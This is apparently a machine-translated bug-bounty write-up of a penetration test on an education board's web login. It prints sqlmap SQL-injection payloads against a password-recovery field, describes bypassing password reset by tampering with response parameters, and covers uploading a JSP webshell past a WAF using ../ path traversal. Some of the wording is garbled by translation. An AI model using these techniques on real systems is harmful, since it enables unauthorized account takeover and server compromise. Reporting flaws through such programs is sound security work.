Education SRC 700RANK thought to continue to rush a wave of points, as soon as possible on the core, so there is the process of the following penetration test.
Start a login box, and there is a password retrieval function.
Belonging to an education board
After opening burp to capture the login package, it was found that the user password was not encrypted, so I tried to burst the password of admin account. The following error was reported after running the password, it seems that the blasting road can not go through.
So FOFQ looked up the IP, no side stations. Moving on to the liver’s next function point, password retrieval
Password recovery
You can see that there must be data interaction, so test the SQL with a single quotation mark and return 500
SQL > insert into sqlmap; SQL > insert into SQLmap;
And you get the payload as follows
sqlmap resumed the following injection point(s) from stored session:
—
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: login_name=admin’ AND 5698=5698 AND ‘yKnB’=’yKnB
Vector: AND [INFERENCE]
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: login_name=admin’ AND (SELECT 3409 FROM (SELECT(SLEEP(5)))iWYb) AND ‘ZAHe’=’ZAHe
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Error reporting and delayed injection have little significance for subsequent penetration. Continue fuzz and try to retrieve the password according to normal logic.
Fetching the return package, we can clearly see that there is a success parameter with a value of false, we change it to true,
The page shows the following, the flag parameter is not empty, this is playing CTF, replay the password request again.
The value of flag should be set here, but do not know the value of flag, do not know how to start
Ok, change the idea, since the admin account does not set the mobile phone number, then I will run the account, there is always set the mobile phone account, flag appears, now I do not know what effect. To test accounts with cell phone numbers.
Enter the verification code at will and click Next, presumably understanding that this flag is equivalent to an ID.
We continue to capture the return package, change the success parameter to true, and successfully reach the reset password interface
After setting the new password, we used burp to capture the packet, and found that there were two parameters flag and PWD flag, which we had obtained before when running the user name, so I pulled them out separately and copied the previous flag.
Send, which returns true indicating that the change was successful
Success of landing
Now that I’ve logged in successfully, I’m looking for an upload point
Java station that is JSP and JSPX, after some fuzz to find a photo album management
First I uploaded a picture and got the upload path.
Then in the construction of JSP pony attempt to upload, the target exists WAF JSP can not upload, I was not surprised ah.
Looking at the suspicious parameter points in the POC, this is the file path we need, and the file name, we can try to change the file suffix here.
Confirmed the conjecture.
Then continue to construct the POC, successfully upload, concatenate the PREVIOUSLY obtained URL, try to access
Found directly printed, it seems that is not parsing.
You can obviously see the directory structure here, so try deleting some directories and uploading again
For example,
Description Directory skipped successfully
Continue to visit found or directly printed, not slowly fuzz jump directory, I directly jumped to his root directory below.
Analyzing, this is the directory that was originally uploaded and not parsed, we can see that there are four layers of directories
After the following two layers of directories are deleted, the directory still remains
These two layers of directories use.. /.. / to skip the two directories.
Concatenate access with the previous path.
Unauthorized, click on it and submit it as a package
Show me the code audit, boys.
This paper involves related experiments: SQL injection (this experiment takes PHP and mysql as the environment, simply shows the occurrence principle and utilization process of SQL, through the comparison of explicit error injection and blind injection, more intuitively shows the different utilization methods of injection.)